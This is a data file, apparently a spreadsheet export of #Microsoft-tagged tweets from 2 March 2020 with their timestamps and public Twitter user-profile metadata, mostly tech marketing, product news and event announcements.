    <t>{'id': 1234466053817761794, 'id_str': '1234466053817761794', 'name': 'Melody Everett', 'screen_name': 'faydronorse', 'location': 'Mobile, USA', 'description': 'My night has become a sunny dawn because of you', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 22, 'listed_count': 0, 'created_at': 'Mon Mar 02 13:10:22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'http://pbs.twimg.com/profile_images/1234481537162383360/Kr1ykeer_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234481537162383360/Kr1ykeer_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234466053817761794/1583158346',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</si>
  <si>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15:38:05 +0000 2020</t>
  </si>
  <si>
    <t>Join our @NICECompliance and @Microsoft compliance 'rock stars' for a forum dedicated to #Cloud and #Teams. Its your last chance to register  click here to learn more &amp;gt;&amp;gt;  https://t.co/9KPPKBh7m8
#NICECompliance #NetworkwithNICE #Microsoft #Compliance
https://t.co/lKBs6d4CxF</t>
  </si>
  <si>
    <t>{'id': 49210737, 'id_str': '49210737', 'name': 'Daniel CarreÃ±o', 'screen_name': 'daca3021', 'location': 'Bogota', 'description': 'Drummer &amp; Engineer. That is the question', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 201, 'friends_count': 977, 'listed_count': 4, 'created_at': 'Sun Jun 21 03:00:39 +0000 2009', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12188, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B2DFDA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2961348834/1beb5a0b2b7d9da2ad21de3429570532_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2961348834/1beb5a0b2b7d9da2ad21de3429570532_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/49210737/1369884471', 'profile_link_color': '93A644', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 15:37:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Store https://t.co/jUZ7kWoSuw</t>
  </si>
  <si>
    <t>{'id': 297626814, 'id_str': '297626814', 'name': 'mike', 'screen_name': 'darmstadiym', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 26, 'friends_count': 336, 'listed_count': 0, 'created_at': 'Thu May 12 20:41:07 +0000 2011', 'favourites_count': 115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5371,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'http://pbs.twimg.com/profile_images/1425982261/avatar_normal.JPEG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1425982261/avatar_normal.JPEG',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</si>
  <si>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15:37:11 +0000 2020</t>
  </si>
  <si>
    <t>Brave deemed most private browser in terms of 'phoning home' https://t.co/ySClnj5mZA #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 15:37:09 +0000 2020</t>
  </si>
  <si>
    <t>It's Time to move your Supply Chain out of China.
#CoronaVirus #CoronaVirusUpdate #CoronavirusOutbreak 
#Starbucks #Apple #Microsoft #Amazon #Tesla #Dell #Honeywell #Qualcomm #Google #Cisco #Intel #HP #GM #Ford #China #XiJinping 
https://t.co/ZCzBVfYc0t</t>
  </si>
  <si>
    <t>Mon Mar 02 15:35:04 +0000 2020</t>
  </si>
  <si>
    <t>FIND YOUR ROLE-BASED TRAINING AND CERTIFICATION SOLUTION IN MICROSOFT TECHNOLOGIES
New Horizons of Prague, #Microsoft #Learning Partner, offer a breadth of training solutions to suit your learning needs.
https://t.co/KUDra1s8Nx
#RoleBased #Certification #NewHorizonsPrague https://t.co/dW326AweLV</t>
  </si>
  <si>
    <t>Mon Mar 02 15:30:50 +0000 2020</t>
  </si>
  <si>
    <t>Vulnerabilities hidden away are amongst the most valuable, newly-published research reveals how easy they can be to exploit.
#Microsoft #Linux #CyberAttack
https://t.co/dSnDJS0kUS</t>
  </si>
  <si>
    <t>{'id': 728777230206308352, 'id_str': '728777230206308352', 'name': 'Data Ethics LLC', 'screen_name': 'Data_ethics', 'location': 'Rochester, NY', 'description': 'Data Ethics assists with data analytic needs by focusing on four key points of excellence in the use of data: governance, analytics, privacy, and team.', 'url': 'https://t.co/wk1xDgSkRU', 'entities': {'url': {'urls': [{'url': 'https://t.co/wk1xDgSkRU', 'expanded_url': 'http://www.dataethics.net', 'display_url': 'dataethics.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 21, 'friends_count': 62, 'listed_count': 0, 'created_at': 'Sat May 07 02:43:26 +0000 2016', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 255,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'http://pbs.twimg.com/profile_images/746174583049490432/2ZDvvdH3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/746174583049490432/2ZDvvdH3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/728777230206308352/1572374292',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</si>
  <si>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15:30:03 +0000 2020</t>
  </si>
  <si>
    <t>"...while not every tech business has the scope of #Microsoft, there are seven dimensions of #AI that all companies in the field should recognise and explore in order to achieve the same-targeted levels of power, ethics, and trust https://t.co/Y1kyqitRrE</t>
  </si>
  <si>
    <t>{'id': 251856393, 'id_str': '251856393', 'name': 'Isaias Sosa', 'screen_name': 'isaiassosa', 'location': 'Monterrey', 'description': 'Sharing content on latest Business and Tech Trends.. Married | Business Advisor | Digital Enthusiast | @microsoft Employee | Social trader | Sports fan', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 171, 'friends_count': 421, 'listed_count': 1, 'created_at': 'Mon Feb 14 00:20:34 +0000 2011', 'favourites_count': 476, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 406,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'http://pbs.twimg.com/profile_images/829378480492011520/7QNBQm_2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/829378480492011520/7QNBQm_2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/251856393/1493008592',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</si>
  <si>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Mon Mar 02 15:27:02 +0000 2020</t>
  </si>
  <si>
    <t>Did you know that Datahaven leverages familiar #Microsoft Technology that your users already know how to use? 
Find out more: https://t.co/YIGLCg0EsQ   
#MSDyn365BC #BCUG https://t.co/Sna1kh2v0m</t>
  </si>
  <si>
    <t>{'id': 479562201, 'id_str': '479562201', 'name': 'Datahaven4Dynamics', 'screen_name': 'Datahaven4', 'location': 'Virginia, U.S.A.', 'description': 'Datahaven for Dynamics offers scanning, OCR, &amp; workflow embedded in the Microsoft Dynamics platform and is the only solution also embedded inside of Outlook.', 'url': 'http://t.co/YSbG3LFRfC', 'entities': {'url': {'urls': [{'url': 'http://t.co/YSbG3LFRfC', 'expanded_url': 'http://Datahaven4Dynamics.com', 'display_url': 'Datahaven4Dynamics.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 166, 'friends_count': 146, 'listed_count': 6, 'created_at': 'Tue Jan 31 14:29:24 +0000 2012', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 625,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'http://pbs.twimg.com/profile_images/1092937559779536897/NzAxT5wP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1092937559779536897/NzAxT5wP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/479562201/1549411723',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</si>
  <si>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15:26:16 +0000 2020</t>
  </si>
  <si>
    <t>Choices... Choices... Love them both. Maybe one day left and the other day right  #Microsoft #mouse  #pink  https://t.co/rBOB9BprCE</t>
  </si>
  <si>
    <t>{'id': 934785946893111296, 'id_str': '934785946893111296', 'name': 'Isidora Katanic ðŸ¦‹', 'screen_name': 'IsidoraKatanic', 'location': 'Basel-Country, Switzerland', 'description': 'Keeps me busy: @ExpertsLiveEU &amp; @ExpertsLiveCH community-driven IT conferences âž¡ï¸ #Microsoft technologies â¤ï¸ðŸ’šðŸ’™ðŸ’› \n#CommunityRocks ðŸ‘©\u200dðŸ’»\n@makeitnoble â˜ï¸', 'url': 'https://t.co/fF13f33ZhN', 'entities': {'url': {'urls': [{'url': 'https://t.co/fF13f33ZhN', 'expanded_url': 'https://www.isidorakatanic.com', 'display_url': 'isidorakatanic.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1850, 'friends_count': 1458, 'listed_count': 18, 'created_at': 'Sun Nov 26 14:08:32 +0000 2017', 'favourites_count': 11220, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6774,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'http://pbs.twimg.com/profile_images/1085182256967081984/M4S0rVwT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1085182256967081984/M4S0rVwT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/934785946893111296/1571769313',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</si>
  <si>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15:26:10 +0000 2020</t>
  </si>
  <si>
    <t>What is #BillGates's agenda for the year 2020?
#Microsoft #technology 
https://t.co/Ym0Nq3NQqE</t>
  </si>
  <si>
    <t>{'id': 37122397, 'id_str': '37122397', 'name': 'Mrinal Chatterjee', 'screen_name': 'mrinal_chatter', 'location': 'Bengaluru, India', 'description': 'Vice President, Merchant Technology, Walmart Labs India', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 97, 'friends_count': 111, 'listed_count': 2, 'created_at': 'Sat May 02 02:57:24 +0000 2009', 'favourites_count': 202, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 204,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'http://pbs.twimg.com/profile_images/1094934426344075264/Gpy-3C8f_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1094934426344075264/Gpy-3C8f_normal.jpg',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</si>
  <si>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15:25:05 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft assures that #Chromium #Edge protects users from malicious extensions https://t.co/LxeIBRQeN8</t>
  </si>
  <si>
    <t>Mon Mar 02 15:25:00 +0000 2020</t>
  </si>
  <si>
    <t>Tomorrow in Cairo: #HPE #Microsoft #HybridCloud Summit with #ZeroDownSoftware as sponsor : join industry experts to accelerate your #HybridCloud Strategy. Register at https://t.co/1bb3XxBn5P 
#AzureStackHub #AzureStackHCI #MSDev2020 @MicrosoftEgypt @MSEurope @MicrosoftAfrica https://t.co/zWn7AA8MyG</t>
  </si>
  <si>
    <t>Mon Mar 02 15:23:27 +0000 2020</t>
  </si>
  <si>
    <t>With so many chances to explore real-world AI use cases and learn best practices for data and analytics at #HIMSS20, youll want to prioritize. Click here to download an agenda: https://t.co/KArrdtES38 https://t.co/6x9d8vRIrz #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 15:23:09 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts translucent Xbox controller looks the best in new pink option https://t.co/mYTvKn5aDY #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 15:21:29 +0000 2020</t>
  </si>
  <si>
    <t>Open #Letter Calls for '
#NoTimeToDie Release to Be Pushed Back Over 
#Coronavirus: 
"It's Just a #Movie" 
https://t.co/3PgrdbeAZo
#bigdata 
#Movies
#Tvshows
#healthCare #COVID19
#actress #model #modelling
@Chidambara09 #linux #china #usa #youtube #UK
#apple #Microsoft #America</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</si>
  <si>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927170,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</si>
  <si>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15:20:04 +0000 2020</t>
  </si>
  <si>
    <t>Want to learn more about Microsoft Teams? Join the Chicagoland #Teams User Group on LinkedIn https://t.co/GagezW99Tr #Chicago #Chicagoland #Microsoft #UserGroup</t>
  </si>
  <si>
    <t>{'id': 45698151, 'id_str': '45698151', 'name': 'Ric Opal', 'screen_name': 'ricopal', 'location': 'Oakbrook, IL', 'description': "I'm a Microsoft thought leader on Azure. I enjoy my family, playing bass guitar, fishing and learning new things.", 'url': 'https://t.co/hsJ132vjly', 'entities': {'url': {'urls': [{'url': 'https://t.co/hsJ132vjly', 'expanded_url': 'http://www.swc.com', 'display_url': 'swc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 348, 'friends_count': 507, 'listed_count': 17, 'created_at': 'Mon Jun 08 23:07:31 +0000 2009', 'favourites_count': 62, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2396,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'http://pbs.twimg.com/profile_images/992210663153000449/PfGbUgAg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/992210663153000449/PfGbUgAg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/45698151/1525396494',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</si>
  <si>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Mon Mar 02 15:15:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft continues to invest in role-based certifications, and is about to retire the MCSA, MCSD and MCSE certifications... https://t.co/9czSftTD9h https://t.co/36aKyUoXWQ</t>
  </si>
  <si>
    <t>Mon Mar 02 15:11:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is retiring its MCSA, MCSD and MCSE certifications in June 2020 by @zdnet https://t.co/EBO1JvgdW1 #microsoft via @DotNetKicks</t>
  </si>
  <si>
    <t>Mon Mar 02 15:11:13 +0000 2020</t>
  </si>
  <si>
    <t>HMRC CEO denies it is deliberately misleading public over loan scheme promoter arrests https://t.co/ZtkyOsfMM4 via @Hybrid_Circle #Microsoft #HPE</t>
  </si>
  <si>
    <t>Mon Mar 02 15:10:59 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is removing its #digital "assistant" #Cortana from local accounts, even as it makes local accounts hard to create (you have to be disconnected from the Net when you install Windows). Anyway, this'll be a #Windows10 update I'm looking forward to! https://t.co/dcC6ocC3Nj</t>
  </si>
  <si>
    <t>Mon Mar 02 15:10:08 +0000 2020</t>
  </si>
  <si>
    <t>#microsofts translucent Xbox controller looks the best in new pink option https://t.co/Dlwz45t1a2 https://t.co/Thvd6f2ARI</t>
  </si>
  <si>
    <t>Mon Mar 02 15:10:01 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 15:06:22 +0000 2020</t>
  </si>
  <si>
    <t>Maurice De Vidts talks about the performance and scalability gains available to customers using #HPESynergy for your #SQLServer #BigData clusters.
#HPEalliances #Microsoft #Azure #SQL #TechNativeTV https://t.co/4GmuLkRdsL</t>
  </si>
  <si>
    <t>Mon Mar 02 15:05:19 +0000 2020</t>
  </si>
  <si>
    <t>Build5Nines Weekly: March 2, 2020 https://t.co/6phMhuvCLn #Microsoft #Azure</t>
  </si>
  <si>
    <t>Mon Mar 02 15:05:13 +0000 2020</t>
  </si>
  <si>
    <t>Brave deemed most private browser in terms of 'phoning home' https://t.co/Bwsls1GurC #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 15:05:02 +0000 2020</t>
  </si>
  <si>
    <t>A great @buncee #Bunceecoffeetalk w/ @billbass about #globaled #iste #accessibility #education https://t.co/OdlnlPDa8m #k12 #edtech @iste #thriveinedu #future4edu #MIEExpert #Microsoft #ntchat https://t.co/BYP8thw1Ka</t>
  </si>
  <si>
    <t>{'id': 49860518, 'id_str': '49860518', 'name': 'Rachelle Dene Poth #ThriveinEDU #AI #ARVR', 'screen_name': 'Rdene915', 'location': 'Pittsburgh', 'description': 'Consultant | Speaker| Educator| Attorney | Author In Other Words &amp; Unconventional |EduGladiator| Pres. #iSTETEN| Nearpod #PioNear| #4OCFPLN #EduMatchðŸ’¥ðŸ’œ', 'url': 'https://t.co/eN0hRsmpUq', 'entities': {'url': {'urls': [{'url': 'https://t.co/eN0hRsmpUq', 'expanded_url': 'https://sites.google.com/view/rachelledenepoth/about-me', 'display_url': 'sites.google.com/view/rachelledâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 24373, 'friends_count': 9787, 'listed_count': 1109, 'created_at': 'Tue Jun 23 02:45:55 +0000 2009', 'favourites_count': 166174, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 132153, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '303030', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1076660238110076928/5jF2rnzi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1076660238110076928/5jF2rnzi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/49860518/1580402389', 'profile_link_color': '1A237E',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</si>
  <si>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Im super excited to join @Microsoft today on a mission to empower every person and organization on the planet to achieve more. @MicrosoftLife #Microsoft https://t.co/TVUI6jlRcP</t>
  </si>
  <si>
    <t>{'id': 78290015, 'id_str': '78290015', 'name': 'Michael', 'screen_name': 'MichaelNwanna', 'location': 'ÃœT: 6.6425756,3.3138095', 'description': 'Software Engineering Lead on a mission with Microsoft to empower every person and organization on the planet to achieve more.', 'url': 'https://t.co/TBml15Rypa', 'entities': {'url': {'urls': [{'url': 'https://t.co/TBml15Rypa', 'expanded_url': 'http://www.totalsmscontrol.com', 'display_url': 'totalsmscontrol.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 191, 'listed_count': 6, 'created_at': 'Tue Sep 29 12:11:19 +0000 2009', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 129,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'http://pbs.twimg.com/profile_images/1048670616885321728/O0jiEt4R_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1048670616885321728/O0jiEt4R_normal.jpg',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</si>
  <si>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15:04:08 +0000 2020</t>
  </si>
  <si>
    <t>Today is the day! 
Our founder @AstronautAbby will be attending @NASA's In-Flight #Education Downlink at the @museumofflight to represent #TheMarsGeneration 
Tune in at 11:55AM CST to watch live: https://t.co/DiBgiv33Gx
#Ad #Microsoft #WomensHistoryMonth #WomeninSTEM https://t.co/ttMpKtLGxM</t>
  </si>
  <si>
    <t>{'id': 1289621131, 'id_str': '1289621131', 'name': 'The Mars Generation', 'screen_name': 'TheMarsGen', 'location': '', 'description': 'Building a stronger tomorrow by exciting our youth today about space &amp; STEM! Educating people about the importance of space exploration. Founder @AstronautAbby', 'url': 'https://t.co/S6MT3NesAC', 'entities': {'url': {'urls': [{'url': 'https://t.co/S6MT3NesAC', 'expanded_url': 'http://themarsgeneration.org/', 'display_url': 'themarsgeneration.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 45112, 'friends_count': 2464, 'listed_count': 454, 'created_at': 'Fri Mar 22 20:41:30 +0000 2013', 'favourites_count': 26838, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 21921,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'http://pbs.twimg.com/profile_images/622061789484707840/0-1_A-Dc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/622061789484707840/0-1_A-Dc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1289621131/1556897600',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</si>
  <si>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Mon Mar 02 15:03:40 +0000 2020</t>
  </si>
  <si>
    <t>Big tech  #Apple #Microsoft #Amazon #Alphabet each now worth over $1trn. Facebook ...a mere $620bn. https://t.co/rVvRSie1z1</t>
  </si>
  <si>
    <t>{'id': 2242536158, 'id_str': '2242536158', 'name': 'Elaine Cahill', 'screen_name': 'dotnetdiva', 'location': 'USA', 'description': 'MCSD, MCP, NCSU GoPack!', 'url': 'http://t.co/pU7iNHhjQe', 'entities': {'url': {'urls': [{'url': 'http://t.co/pU7iNHhjQe', 'expanded_url': 'http://www.ecahill.com', 'display_url': 'ecahill.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 554, 'friends_count': 199, 'listed_count': 20, 'created_at': 'Thu Dec 12 15:33:48 +0000 2013', 'favourites_count': 1342, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1664,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'http://pbs.twimg.com/profile_images/412553277427830784/B2WSBr93_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/412553277427830784/B2WSBr93_normal.jpeg',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</si>
  <si>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15:02:17 +0000 2020</t>
  </si>
  <si>
    <t>Stress Is A Key To Understanding Many Social Determinants Of Health
https://t.co/NZbifRlqdZ
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft #Z55 #Z65 https://t.co/hVDE9aeIqZ</t>
  </si>
  <si>
    <t>Mon Mar 02 15:02:16 +0000 2020</t>
  </si>
  <si>
    <t>Can't wait for that battle royal mode. 
https://t.co/kzHTHv83V0 #callofduty #callofdutymodernwarfare #twitchstreamer #twitchaffiliate #HamiltonGeekca #hamiltongeek #hamiltongeekstreamteam #videogames #gaming #gamingnerd #gamingcommunity #gamernerd #xboxone #microsoft https://t.co/xT6nBhvGNN</t>
  </si>
  <si>
    <t>{'id': 1085675803558494208, 'id_str': '1085675803558494208', 'name': 'Davidthegoodgaming', 'screen_name': 'Davidthegoodga1', 'location': '', 'description': 'â¬‡ï¸FOLLOW MY TWITCH â¬‡ï¸.                            \nhttps://t.co/r1GGHNWi6Z\n\nâ¬‡ï¸âš”SUBSCRIBE TO MY YOUTUBEâš”â¬‡ï¸\n \n  https://t.co/uwdbmTqSqXâ€¦', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/r1GGHNWi6Z', 'expanded_url': 'http://twitch.tv/davidthegood25', 'display_url': 'twitch.tv/davidthegood25', 'indices': [51, 74]}, {'url': 'https://t.co/uwdbmTqSqX', 'expanded_url': 'http://m.youtube.com/channel/UC1HoA', 'display_url': 'm.youtube.com/channel/UC1HoA', 'indices': [110, 133]}]}}, 'protected': False, 'followers_count': 30, 'friends_count': 82, 'listed_count': 0, 'created_at': 'Wed Jan 16 23:10:57 +0000 2019', 'favourites_count': 208, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 255, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1085676017295998976/1LDJbCT8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1085676017295998976/1LDJbCT8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1085675803558494208/1547691610',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</si>
  <si>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15:01:58 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Defender #software to combat #malware on #iOS and #Android #mobile platforms
https://t.co/b3X0nl4WEh</t>
  </si>
  <si>
    <t>{'id': 617734710, 'id_str': '617734710', 'name': 'Rostie &amp; Associates', 'screen_name': 'RostieTechJobs', 'location': 'Toronto', 'description': 'Experienced Global Boutique Recruiters that specialize in Senior Executive, Director, Sales, Marketing &amp; Engineering Computer Software &amp; Networking posts', 'url': 'http://t.co/KtQd7seS0u', 'entities': {'url': {'urls': [{'url': 'http://t.co/KtQd7seS0u', 'expanded_url': 'http://www.rostie.com', 'display_url': 'rostie.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3131, 'friends_count': 3441, 'listed_count': 485, 'created_at': 'Mon Jun 25 01:34:39 +0000 2012', 'favourites_count': 1981, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12338,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'http://pbs.twimg.com/profile_images/655034777406455808/PnVr08I0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/655034777406455808/PnVr08I0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/617734710/1554158563',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</si>
  <si>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15:01:12 +0000 2020</t>
  </si>
  <si>
    <t>Shift + Drag to Make a Regular Shape: Drawing a shape in #Microsoft #Office365? Holding down Shift as you drag will make the shape equal on all sides so it's easy to make a perfect square or a circle.</t>
  </si>
  <si>
    <t>Mon Mar 02 15:01:11 +0000 2020</t>
  </si>
  <si>
    <t>"Our generation all have phones in their pockets, so Teams is the future." (Sindri Smarason, Cast House Operator, Alcoa). See how #Microsoft #Teams is providing a new generation of communication tools for a new generation of Alcoa workers. https://t.co/iIhU91NmBL</t>
  </si>
  <si>
    <t>{'id': 2461729038, 'id_str': '2461729038', 'name': 'Lavoie CPA', 'screen_name': 'LavoieCPA', 'location': 'Charlotte NC', 'description': "Services, Software &amp; Support for Growth Companies. Know your company's financial health at a glance &amp; gain strategic advantages. AaaS - Accounting as a Service", 'url': 'https://t.co/SPrtPlQEF0', 'entities': {'url': {'urls': [{'url': 'https://t.co/SPrtPlQEF0', 'expanded_url': 'http://www.lavoiepllc.com', 'display_url': 'lavoiepllc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 270, 'friends_count': 505, 'listed_count': 15, 'created_at': 'Thu Apr 24 14:22:18 +0000 2014', 'favourites_count': 97, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 743, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '4A913C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/854686915626504192/Xfkh3Rg2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/854686915626504192/Xfkh3Rg2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2461729038/1580855618', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '333333', 'profile_text_color': 'DDEEF6', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 15:01:01 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #cloud      Want $3,500 (per year!) credit for your #nonprofit to get complete access to @Azure cloud solutions and services? Watch "Activating your organization's Azure credits," from @MSFTNonprofits, to learn how to redeem your credits. https://t.co/zD9UiwCdvx</t>
  </si>
  <si>
    <t>Mon Mar 02 15:00:20 +0000 2020</t>
  </si>
  <si>
    <t>New Azure Firewall certification and features in Q1 CY2020
https://t.co/CPWJlwwtLd
#Microsoft #Azure #Cloud #Firewall #Security</t>
  </si>
  <si>
    <t>Mon Mar 02 15:00:09 +0000 2020</t>
  </si>
  <si>
    <t>This verged on terrible mean-spiritedness, I feared. According to PC World, #Microsoft is apparently telling those who use Edge and go to:  #google #security https://t.co/Ehpgsj21b7 di @AIGhostWriter https://t.co/Hd1Mnzyl5i</t>
  </si>
  <si>
    <t>Mon Mar 02 15:00:04 +0000 2020</t>
  </si>
  <si>
    <t>Miss last weeks webcast on Microsoft Teams Live Events? Grab the recording And resources here. https://t.co/CoKa3iPCST #microsoft #microsoftteams  #MS... https://t.co/ZLdCzXbvUE</t>
  </si>
  <si>
    <t>Mon Mar 02 14:59:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft To Do for iOS updated with lots of fixes and improvements https://t.co/NOuTAh3rU8</t>
  </si>
  <si>
    <t>Mon Mar 02 14:59:19 +0000 2020</t>
  </si>
  <si>
    <t>Teams as your phone system. Delivered as a managed service. Integrated using the teams interface for familiarity, ease of use &amp;amp; without the unsightly hardware. #teams is the future. Lets embrace it #Microsoft #MicrosoftTeams #pstncallsviateams</t>
  </si>
  <si>
    <t>{'id': 277428973, 'id_str': '277428973', 'name': 'Jo Hannon', 'screen_name': 'Jannon_01', 'location': 'The Middle Lands', 'description': 'Channel Manager. Seasoned Sales Professional. Delivering white labelled cloud solutions. tweet about work &amp; play. Opinions = Mine.', 'url': 'https://t.co/LalDXjM0jX', 'entities': {'url': {'urls': [{'url': 'https://t.co/LalDXjM0jX', 'expanded_url': 'http://www.conversant.technology', 'display_url': 'conversant.technology', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 185, 'friends_count': 328, 'listed_count': 10, 'created_at': 'Tue Apr 05 10:42:51 +0000 2011', 'favourites_count': 41, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1029, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '125FB8', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/458944867024924672/X8LzxuJ7_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/458944867024924672/X8LzxuJ7_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/277428973/1471538778', 'profile_link_color': '7A100C', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 